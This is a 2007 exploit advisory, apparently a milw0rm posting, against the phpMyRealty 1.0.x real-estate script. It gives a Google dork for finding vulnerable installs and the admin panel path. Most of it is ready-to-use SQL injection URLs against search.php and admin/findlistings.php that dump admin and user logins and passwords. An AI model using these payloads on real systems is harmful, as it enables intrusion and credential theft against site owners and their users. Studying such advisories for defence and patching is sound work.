# xaker.name & grabberz.com
#
# .__ __.
# NN) NNNN JNNN` NNNN. NNN NNNNNNNNNNN NN)
# NN) `NNN).NNNF .NNNNN (NN) """4NNN"""` NN)
# NN) (NNNNNN` (NNNNN) NNN (NNN NN)
# NN) 4NNNN` NNN(NNN.NNF NNN) NN)
# NN) JNNNNL (NN) NNNNNN) (NNN NN)
# NN) JNNNNNN) JNN` `NNNNN JNNF NN)
# NN) .NNNF (NNN. NNN 4NNN) NNN) NN)
# NN) JNNN` NNNN (NN) NNN` (NNN NN)
# NN) NN)
# .__ http://xaker.name __.
#
#
# script name : phpMyRealty 1.0.x
# GoogLe Dork : Powered by phpMyRealty
# Script demo : www.phpmyrealty.com/demo/index.php
# The price : $99.95
# Risk : Average
# Found By : Koller
# Thanks : | robo9 | rijy | Concord | Helkern | Constantine | -St1ff- | .dot | @$_terr_X | b3 |
# Vulnerable files : search.php, findlistings.php
# Vuln : www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
# www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_users
#
# Admin panel: www.victim.com/admin/index.php
#
# Addon :) - sql-injection in findlistings.php
# www.victim.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
# Contact: K0ller (at) hotmail (dot) CoM
# milw0rm.com [2007-12-18]
